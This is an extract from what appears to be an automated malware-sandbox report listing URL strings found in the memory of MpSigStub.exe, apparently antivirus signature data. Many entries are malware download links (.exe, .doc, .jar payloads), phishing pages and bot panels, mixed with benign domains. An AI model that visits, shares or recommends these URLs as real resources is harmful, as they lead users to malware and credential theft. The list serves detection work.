Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://strategosvideo4.com/1547.avi.exe
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://studiojagoda.pl/invoice-receipt/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://stumptowncreative.com/important-please-read/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://survey.news.sina.com.cn/polling.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tak-tik.site/crun20.gif
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://tamus.cz.cc/el/load.php?spl=javad
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://test.ru/botadmin/index.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://thespecsupportservice.com/uno.dat
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://tiasissi.com.br/revendedores/jquery/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://tibiahack.czweb.org/adduser.php?num=
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/oc725yj
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://tixwagoq.cn/in.cgi?14
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://trik.ws/p.jpg
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://trik.ws/pc.exeg
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://unitedcrew.netd
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://urefere.org/opxe.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://verticalagriculture.net/files/csrss.jar
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
